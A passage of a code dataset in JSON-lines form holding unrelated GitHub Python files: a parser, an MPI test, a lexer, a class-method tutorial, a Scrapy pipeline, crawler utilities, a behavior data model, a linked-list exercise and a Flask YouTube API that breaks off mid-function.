SenderBoxDeclaration, \\\n ReceiverBoxDeclaration\n\nclass BoxSyntax(object):\n \"\"\"\n Represents the abstract syntax of a box declaration, which has a name and\n an attribute list.\n \"\"\"\n\n def __init__(self, name, attributeList):\n \"\"\"\n Initializes a new box syntax object with the given name and attribute\n list.\n \"\"\"\n self.name = name\n self.attributes = attributeList\n\n def __getitem__(self, key):\n \"\"\"\n Allows the use of square-bracket notation to retrieve the value of\n one of this box's attributes.\n \"\"\"\n return self.attributes[key]\n\n def __str__(self):\n \"\"\"\n Converts the syntax object into its raw string representation.\n \"\"\"\n return '%s [%s]' % (self.name, str(self.attributes))\n\n def compile(self, boxes, relations):\n \"\"\"\n Checks and compiles the abstract syntax structure to create a new\n :class:`.BoxDeclaration` object of the appropriate subclass.\n\n :param boxes: The list of box declarations compiled so far.\n :param relations: The list of relation declarations compiled so far.\n\n :returns: the newly created box declaration.\n :raises: a :class:`.CompilationError` if any static checks fail.\n \"\"\"\n # Ensure that the box name is not a duplicate\n if find(lambda b: b.name == self.name, boxes):\n raise CompilationError(\n '\"%s\": A box by the name of \"%s\" already exists.' %\n (str(self), self.name))\n\n # Declare a helper function to determine whether an attribute has\n # been included\n includes = lambda s: s in self.attributes and self.attributes[s]\n\n # For a plain function box, ensure that both group name and box typ\n # name are included\n if ((includes('group') and not includes('type')) or\n (includes('type') and not includes('group'))):\n raise CompilationError(\n '\"%s\": Function boxes must have both group and type specified '\n 'as attributes.' % str(self))\n\n # Check the attributes to determine which type of box this might be\n isFunction = includes('group') and includes('type')\n isMacroInput = includes('input')\n isMacroOutput = includes('output')\n isMacro = includes('macro')\n isSender = includes('sender')\n isReceiver = includes('receiver')\n\n # Declare helpers to check how many of these conditions is True\n count_true = lambda xs: reduce(\n lambda acc, x: acc + 1 if x else acc, xs, 0)\n exactly_one = lambda xs: count_true(xs) == 1\n\n # Ensure that exactly one of these cases is true: no more, no less\n if not exactly_one((isFunction, isMacroInput, isMacroOutput,\n isMacro, isSender, isReceiver)):\n raise CompilationError(\n '\"%s\": Invalid combination of attributes for a box '\n 'declaration.' % str(self))\n\n # Finally, create a box declaration of the appropriate class\n if isFunction:\n return FunctionBoxDeclaration(\n self.name, self['group'], self['type'])\n if isMacroInput:\n return MacroInputBoxDeclaration(self.name, self['input'])\n if isMacroOutput:\n return MacroOutputBoxDeclaration(self.name, self['output'])\n if isMacro:\n # Require that the given macro name matches an existing relation\n relation = find(lambda r: r.name == self['macro'], relations)\n if not relation:\n raise CompilationError(\n '\"%s\": No relation constraint named \"%s\" yet exists.' %\n (str(self), self['macro']))\n return MacroBoxDeclaration(self.name, relation)\n if isSender:\n return SenderBoxDeclaration(self.name, self['sender'])\n if isReceiver:\n return ReceiverBoxDeclaration(self.name, self['receiver'])\n \n # We should never reach this point\n assert False\n\n @classmethod\n def parse(cls, text):\n \"\"\"\n Parses the given input text to produce a new BoxSyntax object.\n\n :returns: the newly created box syntax object.\n :raises: a :class:`.ParsingError` if syntax is invalid.\n \"\"\"\n # Ensure that there are no extraneous brackets to confuse the regex\n if text.count('[') != 1 or text.count(']') != 1:\n raise ParsingError(\n '\"%s\": Invalid syntax for a box declaration. Expected a '\n 'single attribute block enclosed in square brackets.' % text)\n\n # Match the line against a regular expression, capturing the box name\n # and the contents of the attribute list within the square brackets\n match = re.match(r'([^\\[\\]]*)\\[([^\\[\\]]*)\\]', text)\n if not match:\n raise ParsingError(\n '\"%s\": Invalid syntax for a box declaration. Expected box '\n 'name followed by an attribute block.' % text)\n name, attributeText = match.groups()\n\n # Parse the attribute list and create a new BoxSyntax object\n return cls(name.strip(), AttributeListSyntax.parse(attributeText))\n","repo_name":"awforsythe/fbrelation","sub_path":"syntax/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"34382658708","text":"# \"\"\"\n# Runs libEnsemble to test communications\n# Scale up array_size and number of workers as required\n#\n# Execute via the following command:\n# mpiexec -np N python3 {FILENAME}.py\n# where N is >= 2\n# The number of concurrent evaluations of the objective function will be N-1.\n# \"\"\"\n\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nfrom mpi4py import MPI\nimport sys, os\nimport numpy as np\n\n# Prob wrap this in the future libe comms module - and that will have init_comms...\n# and can report what its using - for comms - and in mpi case for packing/unpacking\n# Using dill seems more reliable on Bebop - less unpickle errors\nUSE_DILL = False # True/False (req: pip install dill)\n\nif USE_DILL:\n import dill\n import mpi4py\n # Note for mpi4py v3+ - have to initialize differently than previous\n if int(mpi4py.__version__[0]) >= 3:\n MPI.pickle.__init__(dill.dumps, dill.loads)\n else:\n MPI.pickle.dumps = dill.dumps\n MPI.pickle.loads = dill.loads\n\nfrom libensemble.libE import libE\nfrom libensemble.sim_funcs.comms_testing import float_x1000\nfrom libensemble.gen_funcs.uniform_sampling import uniform_random_sample\nfrom libensemble.register import Register #Only being used to pass workerID\nfrom libensemble.controller import JobController #Only being used to pass workerID\nfrom libensemble.resources import Resources #Only to get number of workers\n\nregistry = Register()\njobctrl = JobController(registry = registry, auto_resources = False)\n#registry.register_calc(full_path=sim_app, calc_type='sim') #Test with no app registered.\nnum_workers = Resources.get_num_workers()\n\narray_size = int(1e6) # Size of large array in sim_specs\nrounds = 2 # Number of work units for each worker\n\nsim_max = num_workers*rounds\n\nsim_specs = {'sim_f': float_x1000, # This is the function whose output is being minimized\n 'in': ['x'], # These keys will be given to the above function\n 'out': [\n ('arr_vals',float,array_size),\n ('scal_val',float),\n ],\n }\n\n# This may not nec. be used for this test\n# State the generating function, its arguments, output, and necessary parameters.\ngen_specs = {'gen_f': uniform_random_sample,\n 'in': ['sim_id'],\n 'out': [('x',float,2),\n ],\n 'lb': np.array([-3,-2]),\n 'ub': np.array([ 3, 2]),\n 'gen_batch_size': sim_max,\n 'batch_mode': True,\n 'num_active_gens':1,\n 'save_every_k': 300\n }\n\n#sim_max = num_workers\nexit_criteria = {'sim_max': sim_max}\n\n\nnp.random.seed(1)\npersis_info = {}\nfor i in range(MPI.COMM_WORLD.Get_size()):\n persis_info[i] = {'rand_stream': np.random.RandomState(i)}\n\n## Perform the run\nH, persis_info, flag = libE(sim_specs, gen_specs, exit_criteria, persis_info)\n\n\nif MPI.COMM_WORLD.Get_rank() == 0:\n #import pdb; pdb.set_trace()\n for w in range(1, num_workers+1):\n x = w * 1000.0\n assert np.all(H['arr_vals'][w-1] == x), \"Array values do not all match\"\n assert H['scal_val'][w-1] == x + x/1e7, \"Scalar values do not all match\"\n","repo_name":"rsln-s/libensemble_var","sub_path":"libensemble/tests/regression_tests/test_comms.py","file_name":"test_comms.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10320417631","text":"\r\n\r\nLETTER = 0\r\nDIGIT = 1\r\nSPACE = 2\r\nUNK = 99\r\n\r\nINT_LIT = 10\r\nIDENT = 11\r\nASSIGN_OP = 20\r\nADD_OP = 21\r\nSUB_OP = 22\r\nMULT_OP =23\r\nDIV_OP = 24\r\nLEFT_PAREN = 25\r\nRIGHT_PAREN = 26\r\n\r\nclass Lexer:\r\n def __init__(self, theString):\r\n self._theString = theString\r\n self._currentCharacterPosition = 0\r\n self._currentCharacter = self._theString[self._currentCharacterPosition]\r\n self._lexeme = \"\"\r\n self._nextToken = UNK\r\n self._tokenMap = {'(': LEFT_PAREN, ')' : RIGHT_PAREN, '+' : ADD_OP, '-' : SUB_OP, '*' : MULT_OP, '/' : DIV_OP}\r\n\r\n def updateLexeme(self):\r\n self._lexeme = self._lexeme + self._currentCharacter\r\n\r\n def advance(self):\r\n self._currentCharacterPosition = self._currentCharacterPosition + 1\r\n if (self._currentCharacterPosition) < len(self._theString):\r\n self._currentCharacter = self._theString[self._currentCharacterPosition]\r\n\r\n def charsRemaining(self):\r\n return self._currentCharacterPosition <= (len(self._theString) - 1)\r\n\r\n def getChar(self):\r\n if self._currentCharacter.isalpha():\r\n charClass = LETTER\r\n elif self._currentCharacter.isdigit():\r\n charClass = DIGIT\r\n elif self._currentCharacter == ' ':\r\n charClass = SPACE\r\n else:\r\n charClass = UNK\r\n return charClass\r\n\r\n def lex(self):\r\n charClass = self.getChar()\r\n if self.charsRemaining():\r\n if charClass == SPACE:\r\n charClass = self.getChar()\r\n elif charClass == LETTER:\r\n self.updateLexeme()\r\n ## Add code for identifiers with more than 1 character\r\n self._nextToken = IDENT\r\n elif charClass == DIGIT:\r\n self.updateLexeme()\r\n ## Add code for integers > 9\r\n self._nextToken = INT_LIT\r\n elif charClass == UNK:\r\n self._nextToken = self._tokenMap[self._currentCharacter]\r\n self.updateLexeme()\r\n if charClass != SPACE:\r\n print(\"Next token is {0}, next lexeme is {1}\".format(self._nextToken, self._lexeme))\r\n self._lexeme = \"\"\r\n self.advance()\r\n\r\n def process(self):\r\n while (self.charsRemaining()):\r\n self.lex()\r\n\r\nif __name__ == \"__main__\":\r\n lexer = Lexer(\"ab + b + (c * d) + 121\")\r\n lexer.process()\r\n","repo_name":"JacobFullerOBU/ProgrammingLanguages","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11607563712","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/7 20:40\n# @Author : XiaTian\n# @File : 绑定方法与非绑定方法.py\n\n\n'''\n 一、绑定方法:绑定给谁就是谁调用,就会把把谁当做第一个参数传进去\n 1、绑定到对象的方法:在类内部没有被装饰器装饰过的函数属性\n 2、绑定到类的方法:在类内定义被classmethod装饰的方法\n 二、非绑定方法:无法自动传值,之定义了一个普通函数,类和对象都可以调用\n 不与类或者对象绑定,被staticmethod装饰的\n\n 三、应用条件\n\n'''\n\n# classes Po:\n# print('hello')\n#\n# classes Foo:\n#\n# def __init__(self,name):\n# self.name = name\n#\n# def tell(self):\n# print('tell %s',self.name)\n#\n# @classmethod\n# def func(cls,aa):\n# aa()\n# print(cls,aa)\n#\n# @staticmethod\n# def func1(x,y):\n# print(x+y)\n# f = Foo('夏天')\n# Foo.func(Po)\n# f.func(Po)\n\nimport hashlib\nimport time\nimport setting\nclass People:\n\n def __init__(self,name,sex,age):\n self.id = self.creat_id()\n self.name = name\n self.age = age\n self.sex = sex\n\n def tell_info(self):\n print('name:%s age:%s sex:%s'%(self.name,self.age,self.sex))\n\n '需求:用户从配置文件里面读配置进行实例化'\n\n @classmethod\n def from_conf(cls):\n obj = cls(setting.name,setting.age,setting.sex)\n return obj\n\n '需求:需要给每个人编译个id'\n @staticmethod\n def creat_id():\n m = hashlib.md5(str(time.time()).encode('utf-8'))\n return m.hexdigest()\n\n# 绑定给类的由类来调用,将类本身当做第一个参数传入\n# p = People.from_conf()\n# p.tell_info()\np1 = People('admin',18,'man')\np2 = People('yun',25,'man')\np3 = People('tian',28,'man')\n\nprint(p1.id)\nprint(p2.id)\nprint(p3.id)\nprint(p1.creat_id)\nprint(p1.tell_info)","repo_name":"summer5625/Mygit","sub_path":"第三模块_面向对象_网络编程基础/面向对象编程/day5/绑定方法与非绑定方法.py","file_name":"绑定方法与非绑定方法.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30859708098","text":"import sys\nimport xml.etree.ElementTree as ET\nfrom pprint import pprint\nfrom PyQt4 import QtGui, QtCore\n\ndef get_pixel_color(i_x, i_y):\n\t#import PyQt4.QtGui # python-qt4\n\tapp = QtGui.QApplication([])\n\tlong_qdesktop_id = QtGui.QApplication.desktop().winId()\n\tlong_color = QtGui.QPixmap.grabWindow(long_qdesktop_id, i_x, i_y, 1, 1).toImage().pixel(0, 0)\n\ti_colour = int(long_color)\n\treturn ((i_colour >> 16) & 0xff), ((i_colour >> 8) & 0xff), (i_colour & 0xff)\n\nclass Point(object):\n def __init__(self,node): \n if node.tag == \"point\":\n xy = str(node.text).split(\",\")\n self.x = int(xy[0])\n self.y = int(xy[1])\n self.point=(self.x,self.y)\n \n def __str__(self):\n return \"x={0} y={1}\".format(self.x, self.y)\n \n\nclass Shape(object):\n def __init__(self, node):\n self.points = []\n \n for child in node:\n self.points.append(Point(child))\n \n def drawShape(self,qpainter,pen=None):\n if not pen:\n pen = QtGui.QPen(QtCore.Qt.black, 3, QtCore.Qt.SolidLine)\n \n qpainter.setPen(pen)\n \n for index in range(0,len(self.points),1):\n startPoint = self.points[index]\n endPoint = self.points[(index+1)%len(self.points)]\n qpainter.drawLine(startPoint.x,startPoint.y,endPoint.x,endPoint.y)\n\nclass ShapeRunner(QtGui.QWidget):\n def __init__(self,XMLMap=None,app=None):\n super(ShapeRunner,self).__init__()\n self.grabPixel = False\n if app:\n self.long_qdesktop_id = QtGui.QApplication.desktop().winId()\n self.grabPixel = True\n \n self.mapSource = XMLMap\n self.name = \"\"\n self.shapes = []\n self.size = (300,500)\n self.start = None\n self.target = None\n \n self.initMap(self.mapSource)\n self.initUI()\n \n\n def initUI(self):\n \n self.setGeometry(40, 40, self.size[0], self.size[1] )\n self.setWindowTitle(str(self.__class__.__name__) + \": \" + self.name)\n self.setWindowIcon(QtGui.QIcon('web.png')) \n \n self.show()\n \n def initMap(self, XMLMap):\n tree = None\n root = None\n if self.mapSource:\n tree = ET.parse(XMLMap)\n root = tree.getroot()\n self.name = str(root.get(\"title\"))\n \n for child in root:\n if child.tag == \"shape\":\n self.shapes.append(Shape(child))\n elif child.tag == \"size\":\n self.getMapSize(child)\n elif child.tag == \"start\":\n self.start = self.getPoint(child)\n elif child.tag == \"target\":\n self.target = self.getPoint(child)\n \n \n def paintEvent(self,e):\n qpainter = QtGui.QPainter()\n qpainter.begin(self)\n self.DrawMap(qpainter)\n self.DrawStart(qpainter)\n self.DrawTarget(qpainter)\n #print get_pixel_color(self.target.x, self.target.y)\n \n if self.grabPixel:\n long_color = QtGui.QPixmap.grabWindow(self.long_qdesktop_id, self.start.x, self.start.y, 1, 1).toImage().pixel(0, 0)\n i_colour = int(long_color)\n print ((i_colour >> 16) & 0xff), ((i_colour >> 8) & 0xff), (i_colour & 0xff)\n qpainter.end()\n \n def DrawMap(self,qpainter):\n for item in self.shapes:\n item.drawShape(qpainter)\n \n def getMapSize(self,node):\n for child in node:\n if str(child.tag) == \"height\":\n self.size = (self.size[0],int(str(child.text)))\n elif str(child.tag) == \"width\":\n self.size = (int(str(child.text)),self.size[1])\n \n def getPoint(self, node):\n retVar = None\n for child in node:\n if str(child.tag) == \"point\":\n retVar = Point(child)\n return retVar\n \n def DrawStart(self,qpainter):\n pen = QtGui.QPen(QtCore.Qt.blue)\n self.DrawPoint(qpainter,pen,self.start)\n \n def DrawTarget(self,qpainter):\n pen = QtGui.QPen(QtCore.Qt.red)\n self.DrawPoint(qpainter,pen,self.target)\n \n def DrawPoint(self,qpainter, pen, point):\n qpainter.setPen(pen)\n qpainter.drawPoint(point.x, point.y) \n \n \n \n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = ShapeRunner(\"Maps\\One.xml\",app)\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main() ","repo_name":"slray/AI","sub_path":"Chapter 4/ShapeRunner.py","file_name":"ShapeRunner.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9472333259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/6/29 19:09\n# @Author : Adyan\n# @File : MyUtils.py\n\nimport json\nimport re\nimport time\nimport pytz\nimport random\n\nfrom datetime import datetime\nfrom faker import Faker\n\nfrom zhanlan_pkg.src.Utils.Mongo_conn import MongoPerson\n\nfake = Faker()\ncntz = pytz.timezone(\"Asia/Shanghai\")\n\n\nclass ReDict:\n\n @classmethod\n def string(\n cls,\n re_pattern: dict,\n string_: str,\n ):\n if string_:\n return {\n key: cls.compute_res(\n re_pattern=re.compile(scale),\n string_=string_.translate(\n {\n ord('\\t'): '', ord('\\f'): '',\n ord('\\r'): '', ord('\\n'): '',\n ord(' '): '',\n })\n )\n for key, scale in re_pattern.items()\n }\n\n @classmethod\n def compute_res(\n cls,\n re_pattern: re,\n string_=None\n ):\n data = [\n result.groups()[0]\n for result in re_pattern.finditer(string_)\n ]\n if data:\n try:\n return json.loads(data[0])\n except:\n return data[0]\n else:\n return None\n\n\nclass Utils:\n\n @classmethod\n def time_cycle(\n cls,\n times,\n int_time=None\n ):\n \"\"\"\n 入库时间规整\n :param times: string - 字符串时间\n :param int_time: True and False - 获时间戳\n :return:\n \"\"\"\n if int_time:\n return int(time.mktime(time.strptime(times, \"%Y-%m-%d\")))\n if type(times) is str:\n times = int(time.mktime(time.strptime(times, \"%Y-%m-%d %H:%M:%S\")))\n return str(datetime.fromtimestamp(times, tz=cntz))\n\n @classmethod\n def merge_dic(\n cls,\n dic: dict,\n lst: list\n ):\n \"\"\"\n 合并多个dict\n :param dic: dict - 主dict\n :param lst: list - 多个字典列表方式传入\n :return:\n \"\"\"\n for d in lst:\n for k, v in d.items():\n if v:\n dic[k] = v\n return dic\n\n @classmethod\n def is_None(\n cls,\n dic: dict,\n ) -> dict:\n \"\"\"\n :param dic: dict\n :return: 返回字典中值是None的键值对\n \"\"\"\n return {\n k: v\n for k, v in dic.items()\n if not v\n }\n\n @classmethod\n def find(\n cls, target: str,\n dictData: dict,\n ) -> list:\n queue = [dictData]\n result = []\n while len(queue) > 0:\n data = queue.pop()\n for key, value in data.items():\n if key == target:\n result.append(value)\n elif isinstance(value, dict):\n queue.append(value)\n if result:\n return result[0]\n\n\nclass Headers:\n\n def headers(self, referer=None):\n while True:\n user_agent = fake.chrome(\n version_from=63, version_to=80, build_from=999, build_to=3500\n )\n if \"Android\" in user_agent or \"CriOS\" in user_agent:\n continue\n else:\n break\n if referer:\n return {\n \"user-agent\": user_agent,\n \"referer\": referer,\n }\n return {\n \"user-agent\": user_agent,\n }\n\n\nclass Cookies(object):\n\n def __init__(self, db_name):\n self.mongo_conn = MongoPerson(db_name, 'cookie').test()\n\n def cookie(self):\n return random.choice(list(self.mongo_conn.find()))\n","repo_name":"liujiang9/zhanlan_pkg","sub_path":"src/Utils/MyUtils.py","file_name":"MyUtils.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30528507317","text":"from __future__ import annotations\n\nfrom datetime import date, datetime, timedelta, time\nfrom typing import cast, Union, TypeVar\n\nimport google.cloud.ndb as ndb\n\n#\nfrom .baseNdb_model import BaseNdbModel\n\nfrom ..config.behavior.beh_constants import FEELING_ONLY_CODE_NEG, FEELING_ONLY_CODE_POS\nfrom ..config.behavior.load_yaml import BehaviorSourceSingleton\nfrom ..utils.data_gen import randIntInRange\nfrom .beh_entry import Entry\nfrom .user import DbUser\n\nbehaviorDataShared = BehaviorSourceSingleton() # read only singleton\n\n\nclass PersonBehavior(BaseNdbModel):\n \"\"\"Behavior entries stored by month:\n AncestorKey: userID -> personID -> monthStartDt\n using Entry occur date\n \"\"\"\n\n monthStartDt = ndb.DateProperty(indexed=True)\n personID = ndb.IntegerProperty(required=True, default=0)\n entries = ndb.StructuredProperty(Entry, repeated=True)\n scoredUpTo = ndb.DateTimeProperty(indexed=False)\n _latestEntry = None # actual entry rec; not just the date\n _earliestEntryDate = None # the date\n\n @property\n def entryList(self) -> list[Entry]:\n return cast(list[Entry], self.entries)\n\n @property\n def unscoredEntries(self: PersonBehavior):\n return [e for e in self.entryList if e.modifyDateTime > self.scoredUpTo]\n\n @property\n def yearMonthKeyStr(self: PersonBehavior):\n return PersonBehavior.keyStrFromDate(self.monthStartDt) # type: ignore\n\n @property\n def earliestEntryDate(self: PersonBehavior):\n # print(\"there are {0} behavior entries\".format( len(self.entries) ))\n # print(\"date list is:\")\n # print( [ e.occurDateTime for e in self.entries] )\n if len(self.entryList) < 1:\n return date.today()\n elif self._earliestEntryDate != None:\n return self._earliestEntryDate\n\n self._earliestEntryDate = min([e.occurDateTime for e in self.entryList]).date() # type: ignore\n return self._earliestEntryDate\n\n @property\n def latestEntryDate(self: PersonBehavior):\n if len(self.entryList) < 1:\n return date.today()\n elif self._latestEntry == None:\n self._latestEntry = self.entryList[0]\n return self._latestEntry.occurDateTime.date() # type: ignore\n\n @property\n def earliestEntryDtTm(self: PersonBehavior):\n return datetime.combine(self.earliestEntryDate, time.min) + timedelta(\n milliseconds=1\n )\n\n @property\n def latestEntryDtTm(self: PersonBehavior):\n return datetime.combine(self.latestEntryDate, time.min) + timedelta(\n milliseconds=1\n )\n\n def addNewEntry(self: PersonBehavior, entry: Entry):\n \"\"\" \"\"\"\n # cat, subCat = behaviorDataShared.catAndSubForCode(entry.behaviorCode)\n bcn = behaviorDataShared.masterDict.get(entry.behaviorCode)\n assert bcn is not None, \"invalid behCode {0}\".format(entry.behaviorCode)\n entry.categoryCode = bcn.topCategoryCode\n entry.oppositeCode = bcn.oppositeCode\n entry.modifyDateTime = datetime.now()\n # print(\"1) BehCount in {0} is {1}\".format(self.monthStartDt, len(self.entries)))\n self.entries.insert(0, entry)\n self._latestEntry = entry\n self.put()\n # print(\"2) BehCount in {0} is {1}\".format(self.monthStartDt, len(self.entries)))\n self.clearCache()\n\n def updateEntry(self: PersonBehavior, secsFromOrigDtTm: int, entry: Entry):\n \"\"\"use time delta and beh_code to find rec to replace\"\"\"\n originalDtTm: datetime = entry.occurDateTime + timedelta(\n seconds=secsFromOrigDtTm\n )\n originalDtTm = originalDtTm.combine(originalDtTm.date(), time=time(0, 0, 0, 0))\n\n for rowNum, e in enumerate(self.entries):\n if e.occurDateTime == originalDtTm and e.behaviorCode == entry.behaviorCode:\n self.entries[rowNum] = entry\n break\n # modifyDateTime is set in _pre_put_hook\n # if len(self.entryList) < secsFromOrigDtTm + 1:\n # secsFromOrigDtTm = 0\n # entry.modifyDateTime = datetime.now()\n\n # self.entries[secsFromOrigDtTm] = entry\n self._latestEntry = entry\n self.put()\n self.clearCache()\n\n def markJustScored(self):\n self.scoredUpTo = datetime.now()\n self.put_async()\n\n def clearCache(self):\n # nothing currently cached\n return\n\n def _pre_put_hook(self):\n if self._latestEntry != None:\n self._latestEntry.modifyDateTime = datetime.now(tz=None)\n\n @staticmethod\n def loadOrInitByCoreIds(user: DbUser, personID: int, occurDate: date):\n # load one PersonBehavior (user/person/month) combo rec from the DB\n if isinstance(occurDate, datetime):\n occurDate = occurDate.date()\n\n monthStartDt = occurDate.replace(day=1)\n thisMonthKeyRec = PersonBehavior.makeKey(user.id_, personID, monthStartDt)\n res = thisMonthKeyRec.get()\n if not res:\n res = PersonBehavior(\n monthStartDt=monthStartDt, personID=personID, entries=[]\n )\n res.key = thisMonthKeyRec\n res.scoredUpTo = datetime.combine(monthStartDt, time.min) - timedelta(\n days=1\n )\n return res\n\n @classmethod\n def loadAllFromCoreIds(cls, user: DbUser, personID: int) -> list[PersonBehavior]:\n # return list of PersonBehavior recs for every month since started dating\n ancestorKey = cls.makeAncestor(user.id_, personID)\n # below requires custom datastore index\n qry = cls.query(ancestor=ancestorKey).order(-cls.monthStartDt)\n return qry.fetch()\n\n # @staticmethod\n # def loadBehaviorsWithDimensions(user: DbUser, personId: int):\n # \"\"\"\n # niu -- missing BehaviorDimensionScores class below\n # \"\"\"\n # # returns raw data 4 behaviors/dimensions\n # from .behavior import\n # (\n # BehaviorDimensionScores,\n # ) # avoid circular import\n\n # allBehavior = PersonBehavior.loadOrInitByCoreIds(user, personId)\n # # print(\"found %s entries in behavior dict\" % (len(allBehavior.entries)) )\n # bds = BehaviorDimensionScores(user, personId, allBehavior)\n # bds.calc()\n # return bds\n\n # @staticmethod\n # def keyStrFromDate(dt):\n # return dt.strftime(MONTH_START_FMT_STR)\n # #\n # @staticmethod\n # def makeKey(userID, personID, dateObj):\n # assert isinstance(dateObj, date) and dateObj.day == 1, \"Err: %s %s\" % (dateObj, dateObj.day)\n # personKey = PersonBehavior.makeAncestor(userID, personID)\n # monthStartStr = PersonBehavior.keyStrFromDate(dateObj)\n # return ndb.Key(PersonBehavior, monthStartStr, parent=personKey)\n\n # @staticmethod\n # def makeAncestor(userID, personID):\n # userKey = ndb.Key(\"User\", userID)\n # return ndb.Key(\"Person\", personID, parent=userKey)\n\n @staticmethod\n def makeFakeEntry(startDate):\n # mock data for testing\n e = Entry()\n e.behaviorCode = MOCK_BEH_CODES[randIntInRange(0, len(MOCK_BEH_CODES) - 1)]\n e.feelingStrength = randIntInRange(0, 4)\n # e.significanceStrength = randIntInRange(0, 4)\n now = date.today()\n daysBetween = (now - startDate).days\n backupDays = randIntInRange(0, daysBetween)\n newDt = now - timedelta(days=backupDays)\n e.occurDateTime = datetime.combine(newDt, datetime.min.time())\n return e\n\n\nMOCK_BEH_CODES = [\n \"avoidComm\",\n \"personalboundaryCross\",\n \"shutoutFeelings\",\n \"waitedReturnmsg\",\n \"hintsNotnoticed\",\n \"brokeupSuddenly\",\n \"InfoWithheld\",\n \"exaggerateMistake\",\n \"pastFocusmistakes\",\n \"contributionsNotowned\",\n \"blamedNegsitch\",\n \"ignoredStress\",\n \"situationTooserious\",\n \"disagreethreatenleave\",\n \"disagreeThreatenhurt\",\n \"mistakeThreatenhurt\",\n \"newsBadshock\",\n \"unclearComm\",\n \"takingTurnspoorly\",\n \"empathizedPoorly\",\n \"suggestionNotuseful\",\n \"conversationLightneg-\",\n \"messageMixed\",\n \"undesiredMsgs\",\n \"talkedAboutself\",\n \"newsGoodsurprise\",\n \"overlookedMistake\",\n \"presentFocusmistakes\",\n \"contributionsOwned\",\n \"workedTogethernegsitch\",\n \"recognizedStress\",\n \"situationKeptlight\",\n \"disagreeWorkthrough\",\n \"disagreeForgiving\",\n \"mistakeForgiving\",\n \"gaveSpace\",\n \"askedpermissionCross\",\n \"sharedFeelings\",\n \"promptReturnmsg\",\n \"hintsNoticed\",\n \"infoSharetact\",\n \"clearComm\",\n \"takingTurnswell\",\n \"empathizedWell\",\n \"suggestionUseful\",\n \"conversationLightpos\",\n \"messageConsistent\",\n \"askedAboutme\",\n \"desiredMsgs\",\n \"cleanOrganized\",\n \"heightRight\",\n \"weightRight\",\n \"breathFresh\",\n \"teethStraight\",\n \"bodySmellgood\",\n \"warmConnected\",\n \"acceptedExlcusiveoffer\",\n \"initiatedDiscussexclusive\",\n]\n","repo_name":"Pathoz-LLC/ts_shared_py3","sub_path":"src/ts_shared_py3/models/behavior.py","file_name":"behavior.py","file_ext":"py","file_size_in_byte":8878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13098550015","text":"from pymongo import MongoClient\nfrom assign import settings\n\nclass Process:\n def __init__(self):\n client = MongoClient(\n settings.MONGODB_SERVER,\n settings.MONGODB_PORT\n )\n\n db = client[settings.MONGODB_DB]\n for collection in settings.MONGODB_COLLECTION:\n if collection not in db.collection_names():\n collection = db.create_collection(collection)\n self.blog_collection = db[settings.MONGODB_COLLECTION[0]]\n self.meta_collection = db[settings.MONGODB_COLLECTION[1]]\n\n def process(self, item):\n col = {\n 'url': item['url'],\n 'heading': item['header']\n }\n self.blog_collection.insert(dict(col))\n\n # save meta data of the blog in table 2 - 'meta'\n col2 = {\n 'url': item['url'],\n 'description': item['desc'],\n 'image': item['image'],\n 'title': item['title'],\n 'vote': item['vote']\n }\n self.meta_collection.insert(dict(col2))\n return item\n","repo_name":"gaurmohit/yCombinator-scrapper","sub_path":"assign/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73319580324","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\ndef LinkedLists(arr):\n head=None\n tail=None\n for i in arr:\n if i==-1:\n break\n else:\n NewNode=Node(i)\n if head==None:\n head=NewNode\n tail=NewNode\n else:\n tail.next=NewNode\n tail=NewNode\n return head\n\ndef printLL(index,head):\n c=0\n while head is not None:\n if c==index:\n return head.data\n head=head.next\n c=c+1\n\nfor i in range(int(input())):\n arr = list(map(int, input().split()))\n index=int(input())\n if len(arr)>=index and arr.index(-1)>index:\n print(printLL(index,LinkedLists(arr)))\n else:\n print()\n","repo_name":"Svastikkka/DS-AND-ALGO","sub_path":"Linked List/Print ith node.py","file_name":"Print ith node.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7646783585","text":"from flask import Flask, request, jsonify\nfrom YouGlance import spy\nimport json\nfrom requests import get, post\nimport time\nimport os\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n\n\n\n@app.route('/')\ndef index():\n return \"YouTube Extension API\"\n\n@app.route(\"/youtube/get_unique_entities\",methods = ['POST'])\ndef get_unique_entities():\n data = json.loads(request.data)\n video_id = data['video_id']\n obj = spy(video_id)\n k = obj.generate_df()\n unique = obj.get_unique_ents()\n print(unique)\n return {\n \"unique_ents\": unique,\n }\n\n\n\"\"\"\n@app.get(\"/youtube/wild_card\")\ndef wild_card_search(item:Item,status_code=status.HTTP_200_OK):\n print(item.query)\n df=pd.DataFrame(item.df)\n print(df.head())\n return {\n 'Text':'Ok'\n }\n \n\"\"\"\n\n\n@app.route(\"/youtube/wild_card\",methods = ['POST'])\ndef wild_card():\n data = json.loads(request.data)\n video_id = data['video_id']\n query = data['query']\n obj = spy(video_id)\n k = obj.generate_df()\n m = obj.wildcard_search(query)\n return {\n \"wild_card\": m,\n 